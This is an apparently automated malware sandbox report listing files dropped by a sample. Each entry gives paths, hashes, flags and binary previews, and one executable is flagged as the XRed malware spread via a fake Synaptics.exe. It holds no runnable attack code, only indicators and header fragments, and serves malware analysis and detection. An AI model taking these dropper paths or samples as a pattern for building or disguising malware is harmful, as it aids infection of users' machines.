                                                                                              Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="Eu17ovNzOo_C9cYNGhRESQ">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5

                                                                                              C:\Users\user\AppData\Local\Temp\ykJqU9E.ini

                                                                                              Download File
                                                                                              Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                              Category:dropped
                                                                                              Size (bytes):1652
                                                                                              Entropy (8bit):5.260209211574574
                                                                                              Encrypted:false
                                                                                              SSDEEP:24:GgsF+0XmSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+Em+pAZewRDK4mW
                                                                                              MD5:F702DADFEEF7F774B718AF2847CFEC18
                                                                                              SHA1:3999FDBF9D5E1482F3221836272F6127B8279B99
                                                                                              SHA-256:542EB2E77D4E2959F9C32F4D320C048CB9DCC1ACBCE787AE50F82C2057B2D5FF
                                                                                              SHA-512:5176EE73099210CF9E2C9CD6C376E38E56E3383A18DFF326A94190656D3CEB4335C08AAB9D20AA199DCC59359606B7AF6274CF53748AEC1AA38F2D14993B0FD5
                                                                                              Malicious:false
                                                                                              Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="bEVy9EvXp3UuAk_sG4h-eA">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5

                                                                                              C:\Users\user\AppData\Local\Temp\zDokV5R.ini

                                                                                              Download File
                                                                                              Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                              Category:dropped
                                                                                              Size (bytes):1652
                                                                                              Entropy (8bit):5.262082264103519
                                                                                              Encrypted:false
                                                                                              SSDEEP:24:GgsF+04tFSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+n+pAZewRDK4mW
                                                                                              MD5:860314A62030B137B25A2102E60EDBA5
                                                                                              SHA1:1DC7AFB3F8224B046F938043A92EC2B5DC401507
                                                                                              SHA-256:E251594BC19AED5100DFBAA7DA47AF6D0D974CAB98123D7C38335915B547FDF4
                                                                                              SHA-512:A81A338D1295DB04C49EC4B174949F46E5DDB7CF7B429A18D6DD26D39546CE8D92FBD534F7ADD5790450DDA354A4E6E55A3D654F0ACF4281C52FC6CB2E3CB75D
                                                                                              Malicious:false
                                                                                              Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="rPOlS_mSObQHRyz2iTWphw">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5

                                                                                              C:\Users\user\AppData\Local\Temp\zWzVjln.ini

                                                                                              Download File
                                                                                              Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                              Category:dropped
                                                                                              Size (bytes):1652
                                                                                              Entropy (8bit):5.257795027747121
                                                                                              Encrypted:false
                                                                                              SSDEEP:24:GgsF+0LBSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+K+pAZewRDK4mW
                                                                                              MD5:53426B2293AC15C3D8C3B8B0FE83AB7C
                                                                                              SHA1:60559E3F95277209A9E02E504FE2F129433BE066
                                                                                              SHA-256:AF60960F087CEA50F554971850FCF541189E20E4EF16B2898708024EEE6D4801
                                                                                              SHA-512:9B81B4356E1370BF2C334996E7AC7E3791735271652DC7FE57B66B8B45A790698DCB59D3DC9659C950C6542A9A1D0803B9664B2D157039ED3A9AFB62434B85C6
                                                                                              Malicious:false
                                                                                              Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="crufDd22jUBh2tE49OUyAg">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5

                                                                                              C:\Users\user\AppData\Local\Temp\zsbKktb3.xlsm

                                                                                              Download File
                                                                                              Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                              File Type:Microsoft Excel 2007+
                                                                                              Category:dropped
                                                                                              Size (bytes):18387
                                                                                              Entropy (8bit):7.523057953697544
                                                                                              Encrypted:false
                                                                                              SSDEEP:384:oUaZLPzMfVSa1VvYXmrsdPkLmDAx7r/l0:oUatwNSSvY2IdsHr/y
                                                                                              MD5:E566FC53051035E1E6FD0ED1823DE0F9
                                                                                              SHA1:00BC96C48B98676ECD67E81A6F1D7754E4156044
                                                                                              SHA-256:8E574B4AE6502230C0829E2319A6C146AEBD51B7008BF5BBFB731424D7952C15
                                                                                              SHA-512:A12F56FF30EA35381C2B8F8AF2446CF1DAA21EE872E98CAD4B863DB060ACD4C33C5760918C277DADB7A490CB4CA2F925D59C70DC5171E16601A11BC4A6542B04
                                                                                              Malicious:false
                                                                                              Preview:PK..........!...5Qr...?.......[Content_Types].xml ...(......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................N.0.E.H.C.-..@.5.....(..8...-.[.g.......M^..s.5.4.I..P;..!....r....}._.G.`....Y....M.7....&.m1cU..I.T.....`.t...^.Bx..r..~0x....6...`....reb2m.s.$.%...-*c.{...dT.m.kL]Yj.|..Yp..".G.......r...).#b.=.QN'...i..w.s..$3..)).....2wn..ls.F..X.D^K.......Cj.sx..E..n._ ....pjUS.9.....j..L...>".....w.... ....l{.sd*...G.....wC.F... D..1<..=...z.As.]...#l..........PK..........!..U0#....L......._rels/.rels ...(...............

                                                                                              C:\Users\user\AppData\Local\Temp\~$zsbKktb3.xlsm

                                                                                              Download File
                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                                                                                              File Type:data
                                                                                              Category:dropped
                                                                                              Size (bytes):165
                                                                                              Entropy (8bit):1.7769794087092887
                                                                                              Encrypted:false
                                                                                              SSDEEP:3:iXKG/4N+RMlW8td:iXlMlW8/
                                                                                              MD5:37BD8218D560948827D3B948CAFA579C
                                                                                              SHA1:24347FB0A66F2DA8AD3BAB818E3C24977104E5DA
                                                                                              SHA-256:189E2D5600E0CC41F498D2EB22FA451F81746DCDBAA3EC1146A22C3A74452DA6
                                                                                              SHA-512:A34D703FEBFD9E45A57BF047D9CCF890482B0F7CD3788F9BFD89DECA13B96DD4F43BDB0C4D81CC716DEAC37BCD1C393A7BCB159B471B5721B367E4884B17C699
                                                                                              Malicious:false
                                                                                              Preview:.user ..f.r.o.n.t.d.e.s.k. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

                                                                                              C:\Users\user\AppData\Local\Temp\~DFCEF85EF10CA15268.TMP

                                                                                              Download File
                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                                                                                              File Type:Composite Document File V2 Document, Cannot read section info
                                                                                              Category:dropped
                                                                                              Size (bytes):32768
                                                                                              Entropy (8bit):3.746897789531007
                                                                                              Encrypted:false
                                                                                              SSDEEP:192:QuY+pHkfpPr76TWiu0FPZK3rcd5kM7f+ihdCF3EiRcx+NSt0ckBCecUSaFUH:ZZpEhSTWi/ekfzaVNg0c4gU
                                                                                              MD5:7426F318A20A187D88A6EC88BBB53BAF
                                                                                              SHA1:4F2C80834F4B5C9FCF6F4B1D4BF82C9F7CCB92CA
                                                                                              SHA-256:9AF85C0291203D0F536AA3F4CB7D5FBD4554B331BF4254A6ECD99FE419217830
                                                                                              SHA-512:EC7BAA93D8E3ACC738883BAA5AEDF22137C26330179164C8FCE7D7F578C552119F58573D941B7BEFC4E6848C0ADEEF358B929A733867923EE31CD2717BE20B80
                                                                                              Malicious:false
                                                                                              Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                              C:\Users\user\Desktop\._cache_file.exe

                                                                                              Download File
                                                                                              Process:C:\Users\user\Desktop\file.exe
                                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows, MS CAB-Installer self-extracting archive
                                                                                              Category:dropped
                                                                                              Size (bytes):288088
                                                                                              Entropy (8bit):7.744384810651628
                                                                                              Encrypted:false
                                                                                              SSDEEP:6144:pWK8EGMUjp5cGQ3Mek1B3B9h8Ins3i8AEYBSawz1YSc:JGvjp5cj35kDB9hrs3zARBSaJSc
                                                                                              MD5:FD6057B33E15A553DDC5D9873723CE8F
                                                                                              SHA1:F90EFB623B5ABEA70AF63C470DAA8674444FB1DF
                                                                                              SHA-256:111AEDDC6A6DBF64B28CB565AA12AF9EE3CC0A56CE31E4DA0068CF6B474C3288
                                                                                              SHA-512:D894630C9A4BDB767E9F16D1B701ACBDF011E721768BA0DC7A24E6D82A4D062A7CA253B1B334EDBA38C06187104351203A92C017838BDD9F13905CDE30F7D94D
                                                                                              Malicious:false
                                                                                              Antivirus:
                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......->..i_.i_.i_..|.d_.i_.._..|..h_..|.q_..|.h_.Richi_.........PE..L...!.};............................^Z..............................................O................................................................N..X............................................................................................text............................... ..`.data...............................@....rsrc...............................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                              C:\Users\user\Documents\CZQKSDDMWR\GLTYDMDUST.xlsm

                                                                                              Download File
                                                                                              Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                              File Type:Microsoft Excel 2007+
                                                                                              Category:dropped
                                                                                              Size (bytes):18387
                                                                                              Entropy (8bit):7.523057953697544
                                                                                              Encrypted:false
                                                                                              SSDEEP:384:oUaZLPzMfVSa1VvYXmrsdPkLmDAx7r/l0:oUatwNSSvY2IdsHr/y
                                                                                              MD5:E566FC53051035E1E6FD0ED1823DE0F9
                                                                                              SHA1:00BC96C48B98676ECD67E81A6F1D7754E4156044
                                                                                              SHA-256:8E574B4AE6502230C0829E2319A6C146AEBD51B7008BF5BBFB731424D7952C15
                                                                                              SHA-512:A12F56FF30EA35381C2B8F8AF2446CF1DAA21EE872E98CAD4B863DB060ACD4C33C5760918C277DADB7A490CB4CA2F925D59C70DC5171E16601A11BC4A6542B04
                                                                                              Malicious:false
                                                                                              Preview:PK..........!...5Qr...?.......[Content_Types].xml ...(......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................N.0.E.H.C.-..@.5.....(..8...-.[.g.......M^..s.5.4.I..P;..!....r....}._.G.`....Y....M.7....&.m1cU..I.T.....`.t...^.Bx..r..~0x....6...`....reb2m.s.$.%...-*c.{...dT.m.kL]Yj.|..Yp..".G.......r...).#b.=.QN'...i..w.s..$3..)).....2wn..ls.F..X.D^K.......Cj.sx..E..n._ ....pjUS.9.....j..L...>".....w.... ....l{.sd*...G.....wC.F... D..1<..=...z.As.]...#l..........PK..........!..U0#....L......._rels/.rels ...(...............

                                                                                              C:\Users\user\Documents\CZQKSDDMWR\~$GLTYDMDUST.xlsx

                                                                                              Download File
                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                                                                                              File Type:data
                                                                                              Category:dropped
                                                                                              Size (bytes):165
                                                                                              Entropy (8bit):1.7769794087092887
                                                                                              Encrypted:false
                                                                                              SSDEEP:3:iXKG/4N+RMlW8td:iXlMlW8/
                                                                                              MD5:37BD8218D560948827D3B948CAFA579C
                                                                                              SHA1:24347FB0A66F2DA8AD3BAB818E3C24977104E5DA
                                                                                              SHA-256:189E2D5600E0CC41F498D2EB22FA451F81746DCDBAA3EC1146A22C3A74452DA6
                                                                                              SHA-512:A34D703FEBFD9E45A57BF047D9CCF890482B0F7CD3788F9BFD89DECA13B96DD4F43BDB0C4D81CC716DEAC37BCD1C393A7BCB159B471B5721B367E4884B17C699
                                                                                              Malicious:false
                                                                                              Preview:.user ..f.r.o.n.t.d.e.s.k. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

                                                                                              C:\Users\user\Documents\CZQKSDDMWR\~$cache1

                                                                                              Download File
                                                                                              Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                              Category:dropped
                                                                                              Size (bytes):771584
                                                                                              Entropy (8bit):6.6264053582391735
                                                                                              Encrypted:false
                                                                                              SSDEEP:12288:aMSApJVYG5lDLyjsb0eOzkv4R7QnvUUilQ35+6G75V9IIr:ansJ39LyjbJkQFMhmC+6GD9j
                                                                                              MD5:7407C51DD7AC30C4D79658D991A8B5D6
                                                                                              SHA1:B48603F6A1DFFAB2FF458780025F6A3C2E523C3C
                                                                                              SHA-256:1316730BBC50851C02F53254F9C57B99AF50A07BB0776332D1480BABD626F39A
                                                                                              SHA-512:38334452808E5D203B287E2F4A47B8F5BBCE1ED18FABCFA4A61B8C04429150DFBFFE2241323B3C87D90ABBABBED49A5CEA584CC1CE83BF519BB728E1D6AC18EB
                                                                                              Malicious:true
                                                                                              Yara Hits:
                                                                                              • Rule: JoeSecurity_XRed, Description: Yara detected XRed, Source: C:\Users\user\Documents\CZQKSDDMWR\~$cache1, Author: Joe Security
                                                                                              • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: C:\Users\user\Documents\CZQKSDDMWR\~$cache1, Author: Joe Security
                                                                                              Antivirus:
                                                                                              • Antivirus: Avira, Detection: 100%
                                                                                              • Antivirus: Avira, Detection: 100%
                                                                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                              • Antivirus: ReversingLabs, Detection: 94%
                                                                                              Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.....................&....................@.......................... ...................@..............................B*...........................P...............@..!............@......................................................CODE............................... ..`DATA....T........0..................@...BSS......................................idata..B*.......,..................@....tls.........0...........................rdata..9....@......................@..P.reloc.......P......................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................

                                                                                              C:\Windows\Logs\DirectX.log

                                                                                              Download File
                                                                                              Process:C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe
                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                              Category:modified
                                                                                              Size (bytes):44146
                                                                                              Entropy (8bit):5.357684473525696
                                                                                              Encrypted:false
                                                                                              SSDEEP:192:gSiwRq5ABGQh58IaEiGZ+jmBf0VX6M/Pi6nE6wtm+ruz7cn06v5dg091Imfx0mTa:gIo
                                                                                              MD5:98E15FB3E25D2924C42176CB2F3E5DFB
                                                                                              SHA1:569AAF163369E06F73D47E46DA4AE4687698F103
                                                                                              SHA-256:AEB284A1DA26C63556350DFEB2A501913228E6F24DC6D2EBA770514AF33D16DE
                                                                                              SHA-512:B0A441EC37C79489CCB97F11BFFE170AFEA352636CCA3618BAC42314DEE95ED6B7D8A6AD2CC40CB3174D0846103837D560ED716195B289E9961BA0750CEBCAA4
                                                                                              Malicious:false
                                                                                              Preview:01/02/25 14:28:33: DXWSetup: ***** DXWSETUP *****..01/02/25 14:28:33: DXWSetup: WinMain()..01/02/25 14:28:33: DXWSetup: IsIA64(): not IA64...01/02/25 14:28:34: DXWSetup: Unable to get Version on target file C:\Windows\system32\directx\websetup\dsetup.dll..01/02/25 14:28:34: DXWSetup: Installed file C:\Windows\system32\directx\websetup\dsetup.dll..01/02/25 14:28:34: DXWSetup: Unable to get Version on target file C:\Windows\system32\directx\websetup\dsetup32.dll..01/02/25 14:28:34: DXWSetup: Installed file C:\Windows\system32\directx\websetup\dsetup32.dll..01/02/25 14:28:34: DXWSetup: GetDXVersion(): Unable to get RC string from registry...01/02/25 14:28:34: DXWSetup: DirectX Version: 4.09.00.0904.00..01/02/25 14:28:34: DXWSetup: Setup Version: 4.09.00.0904.00..01/02/25 14:28:34: DXWSetup: A newer version of DirectX have been installed already...01/02/25 14:28:34: dsetup32: IsWow64(): running on Wow64...01/02/25 14:28:40: DXWSetup: CDXWSetup::CDXWSetup()..01/02/25 14:28:40: DXWSetup: CDX

                                                                                              C:\Windows\SysWOW64\directx\websetup\Apr2005_d3dx9_25_x86.cab

                                                                                              Download File
                                                                                              Process:C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe
                                                                                              File Type:Microsoft Cabinet archive data, many, 1073002 bytes, 5 files, at 0x44 +A "d3dx9_25_x86.cat" +A "d3dx9_25.dll", flags 0x4, ID 6922, number 1, extra bytes 20 in head, 72 datablocks, 0x1 compression
                                                                                              Category:dropped
                                                                                              Size (bytes):1082170
                                                                                              Entropy (8bit):7.999075135168916
                                                                                              Encrypted:true
                                                                                              SSDEEP:24576:i0BodqhH/OCy8M+j5lcB4ZfeXBXUd/QLML9bw6Uzc12:iUbffy/+lmBXF8Ioxw6Uo12
                                                                                              MD5:9C5DCA423D9D68349D290DF291DDBEEF
                                                                                              SHA1:D9F1CAE586470EA309CE9F115525B0504FFFAEA4
                                                                                              SHA-256:5487ED4E969A822E5C481CEFB1D4DA3066B1D5EC8C55798B246915ECB58A8665
                                                                                              SHA-512:9F50599321F45FB7451B0A1C0F1DCBD6B4A4E60EE27B0EF5AA29168C1BCE5B08F34329916EA2EA655CD632D0A19C81953C2A5F1277F6A96FB63AFC098236509D
                                                                                              Malicious:true
                                                                                              Preview:MSCF....j_......D...........................j_...#..............H...7.........r2. .d3dx9_25_x86.cat..#.7.....r2}. .d3dx9_25.dll.......#...r2,. .apr2005_d3dx9_25_x86.inf.......#...r2,. .d3dx9_25_w9x.inf.....k.#...r2,. .d3dx9_25_x86.inf.(.0.?..CK..\....'4.A..".+.@.%..C*.4).b!@..$.....a..k.#..v.w.w.]xg...............9{......k....q....6.Z&Ey-.@.....a.0.T...9b......a...b....ilk.+c.5.af.o.vl..............<....s.z..V.7........fa\.G\$En..._..|$.?9.O...!..H.<...#.,...!.^N.<.g"..=.V|O.a..gwcw...t.c.......X..4(.).. .?.S..0k..._2{<%X.......m.*....D&&..v.c ....Av...u.l. K2......R.0.&.XO8b..p."H@^..2..jbb...hg.&...>.>....u..x....2...@.~....9..u.a.M.X...S5d_..|}z"h..1.....<...Z!...V).............}OO...n.2..Q....../.......R+[C..l..(...@......1........$..vs..K. m...e...b..\}u.+.....?..bg...P.......%.pRgTq.t.t.e<..t.Y._.X.?F.(../.......abb.G5.qkb.\..Z...g.....g..(.....f..Lz.8...h.e....t.R.fJ.iJNCv}:.V.:..m.B..JIQrlA..Z5..HR..)9-...:.......V.JP.)t*.....6m....

                                                                                              C:\Windows\SysWOW64\directx\websetup\Apr2006_d3dx9_30_x86.cab

                                                                                              Download File
                                                                                              Process:C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe
                                                                                              File Type:Microsoft Cabinet archive data, many, 1109261 bytes, 5 files, at 0x44 +A "d3dx9_30_x86.cat" +A "d3dx9_30.dll", flags 0x4, ID 6903, number 1, extra bytes 20 in head, 74 datablocks, 0x1 compression
                                                                                              Category:dropped
                                                                                              Size (bytes):1118429
                                                                                              Entropy (8bit):7.999050518080374
                                                                                              Encrypted:true
                                                                                              SSDEEP:24576:OreyPa6AC8e290lruGDhi3TSvHDh+ISNvRNhPmJ0RRuu:cNoeYEuTSvjh+R3WKRv
                                                                                              MD5:B3D644A116C54AFDA42A61B0058BE112
                                                                                              SHA1:9AF7DDC29EEF98810A1A2F85DB0B19B2EC771437
                                                                                              SHA-256:CA7B9C6A49E986C350147F00A6C95C5B577847B5667B75681A1EE15E3A189106
                                                                                              SHA-512:A2D2F12B7B37BD8F5C8465DD13AD31942DF11EE5ED5423DEEEB178E6B594587706D2C5116258BE1562CAA5ECA691358AF3CB83B77898D1012FF521017D199165
                                                                                              Malicious:true
                                                                                              Preview:MSCF............D................................#..............J..............44f .d3dx9_30_x86.cat..p$........4.e .d3dx9_30.dll......$....4.e .apr2006_d3dx9_30_x86.inf.....z.$....4.e .d3dx9_30_w9x.inf.....+.$....4.e .d3dx9_30_x86.inf.v..[>..CK..X.K..=.. ....+..MBI.. M@.n..QH0....#....c..b/..{.z....E..y.......N8?gg..{..=..{...W..;..:....IA.....a.`.......43GX..r..,.f...+FA..,.....2..a0..2......Z.ty.Ih...m0w..es0Ww.[/.n%q.Z.I...ho......#...G.....\.. 1.P6....;.s.cZ.......t.B...X...LL..X.C.......B.......~......@..!..8..O..O..!mR..fbb.0.8L.f..XO.R.-......Y...y...Q4."5JD...p..s.T.f.2z.6..~...........9VPR.f.BH=.bg.s,.T.!=......O..........B...||}...X..5]R.0.....c.+.4..S....E.7.y...[....3...2$..:qt...7T......Q..@X..Ji...q.Z8.Ea(..@zS.D.3;.b..a.}L.;..PG/-....(...../vL_...@K....c..&....f..y.....3.8fW:.T:N7..W:..t.t...#(.FK.k..X..&...;_...Be.w.....b6.z<..za..}_7.afQ......O{,..Thu...).'+..0{:.V}kI.&Z.JU&&*...B..[.'..t.vK.9.`]..!.)Vht.8e.\.T.....i......I.

                                                                                              C:\Windows\SysWOW64\directx\websetup\Apr2006_xinput_x64.cab

                                                                                              Download File
                                                                                              Process:C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe
                                                                                              File Type:Microsoft Cabinet archive data, many, 81141 bytes, 5 files, at 0x44 +A "xinput1_1_x64.cat" +A "xinput1_1.dll", flags 0x4, ID 7457, number 1, extra bytes 20 in head, 5 datablocks, 0x1 compression
                                                                                              Category:dropped
                                                                                              Size (bytes):90309
                                                                                              Entropy (8bit):7.986243949537019
                                                                                              Encrypted:false
                                                                                              SSDEEP:1536:/0CNqg1WzKHJUq/JSlvxToeSNOUp9BttldRL9zaMNez4fbI9YKztrIrm:/hIg1cEJUxvxlSNOUpfttldRL9zkzAI5
                                                                                              MD5:B0669F7D395078BEE0087B089F0B45C5
                                                                                              SHA1:30506FC3DCE9532EF0A8CB3973347EC9C3C9875F
                                                                                              SHA-256:E63A67783EF7624559F95AB697BF8AFBDAB7ACE31200283EF840E6B94AA16E5A
                                                                                              SHA-512:D7EFCFD85B3CB6CB9B1936B701A9D7D91A6094AA08D8C933EDF8493C6AD57BE05A579980A404B35E9721F71B45F4CAE28399FCA3FF5DF20A9A3138B90F86B94C
                                                                                              Malicious:false
                                                                                              Preview:MSCF.....<......D...............!............<...#.............................44f .xinput1_1_x64.cat..F.........4.d .xinput1_1.dll......e.....4.d .infinst.exe.V....l.....4.e .apr2006_xinput_x64.inf......o.....4.e .xinput1_1_x64.inf.. ...9..CK.{.XSI..MHh..AD.. .7t...4..H.TTB...$.."...,...v].{Y{...u..k.......w..pA..}......<.\.9s.w.9sf.x...}...y..L......j`.c2..6..>..L.i.......F.......QZ...X.p.}c.i.`.,^X/l.8...m._..Fv0.}pOO.................N..>....O 6......X..s....A.'.s0....X...c._0.|...?... .....IM.Ln..e..&..$...6?...K.....f7../.A..2...@=..7.`..L&..u:...w.>...q.q'=&...Sf....'..,.S`R,..aJ..@.nO.6.....TEF+.K...4.-.$....<e........ob.^..\({@).F.A.../.'..I../.F>@}..N.f....h...........q\.7#.~...Rm.2...HO0...{...dx....d..00<.3.v..........d....o:.e...,.....I..^v&.t .O..)Y;.B.7|Q.K....Oo...g.L..5.I.....;t.i.\Z.V..>../..G+.!....z5,.*....1.L..#....58..f....7.x..Va~....bY....\+..U.-M.D..H....d"n{..b.X..V...Lqz..k.h.5..I.d)E..x'.hc.dp.Dr.8E,.(.R..+..5.YZS.1.

                                                                                              C:\Windows\SysWOW64\directx\websetup\Apr2006_xinput_x86.cab

                                                                                              Download File
                                                                                              Process:C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe
                                                                                              File Type:Microsoft Cabinet archive data, many, 40050 bytes, 4 files, at 0x44 +A "xinput1_1_x86.cat" +A "xinput1_1.dll", flags 0x4, ID 6338, number 1, extra bytes 20 in head, 3 datablocks, 0x1 compression
                                                                                              Category:dropped
                                                                                              Size (bytes):49218
                                                                                              Entropy (8bit):7.962835058038329
                                                                                              Encrypted:false
                                                                                              SSDEEP:768:rrXN+lWp5tvn2v0JeuXfYYJDyRIvwde6hecBLdKd+d4RUJ6HwyQs34VvD4:3gl6tfTVXwcWuqe6htcaJyQW4VvD4
                                                                                              MD5:E207FB904E641246F3F7234DB74121FC
                                                                                              SHA1:1BE8C50C074699BDD9184714E9022B7A2F8BF928
                                                                                              SHA-256:3FDF63211B0DD38069A9C1DF74D7BC42742DE003CEF72AD1486AAA92D74546FA
                                                                                              SHA-512:ED95D53BC351C98C0322753265B0A21C98DF97D0E2FBBC58A6836BFF374B7540B0CEA21371CD4A7EAD654210A42E1F9809CAC6E4EAE2ECF0EF2B88E220DC37F7
                                                                                              Malicious:false
                                                                                              Preview:MSCF....r.......D...........................r....#.............................46f .xinput1_1_x86.cat............4.d .xinput1_1.dll............4.e .apr2006_xinput_x86.inf.....R......4.e .xinput1_1_x86.inf...G..>..CK..\SG.8|....&l....-n.6....(Z........"PH..,...+.G.V..b..V....Zm.Z..Xm..ZQ..E.{.......}....&L.g.9s....Jz?tp..N.;.]Y....!...b......t.c..'D%v[...8.8..........F.spf2y,.Gpe.w.......d...o.vs.........G...).bQ....cE%....."..GH.`"....D..B!..i.1..... ..0.. ..K# ...@*...C!M....R....SDq.c...b....#!6....b.....(/.`.....Q....(.!.pE....lB.a....L.M..[..E.........|...;.H!..".P.j........9..<.t.l....]5w.;...R.9qQx...@x..8.........$.1.az!.Z..?.rDP+...c..)U'J..E.H..j....%.......w.;..x.O...>........`0.A4..d.....dT...Q.3..y0.."..].x"...|.C.bs.,...`..h..#D..y.v..OM.1u{..C .X.N......+0....f2...3;...@...P......Z.......H.x.E<....A.-.4OA.Vi.f......."n\....b\...\M+.e.....k.N.q.`....%.@.../Q..V.e...s..."w.......KI........4.u.p..J^.V....D....t.0J...H.HMVg.d....B.v.]..)..

                                                                                              C:\Windows\SysWOW64\directx\websetup\Apr2007_d3dx10_33_x86.cab

                                                                                              Download File
                                                                                              Process:C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe
                                                                                              File Type:Microsoft Cabinet archive data, many, 689905 bytes, 6 files, at 0x44 +A "d3dx10_33_x86.cat" +A "d3dcompiler_33.dll", flags 0x4, ID 9049, number 1, extra bytes 20 in head, 49 datablocks, 0x1 compression
                                                                                              Category:dropped
                                                                                              Size (bytes):699073
                                                                                              Entropy (8bit):7.998968028413629
                                                                                              Encrypted:true
                                                                                              SSDEEP:12288:SHwziN1v34WzSc6IA6ajvY8ov8ZdReUTQ8Mr47JYCophIa9sNDn1QcILtw6:V01wWzCI3ajjls4NpAsNDnMw6
                                                                                              MD5:F784B8A0FD84C8AC3F218A9842D8DA56
                                                                                              SHA1:FB7B4B0F81CD5F1C6A900C71BFD4524AF9A79ECE
                                                                                              SHA-256:949068035CE57BBB3658217EC04F8DE7A122C6E7857B6F8B0CA002EB573DF553
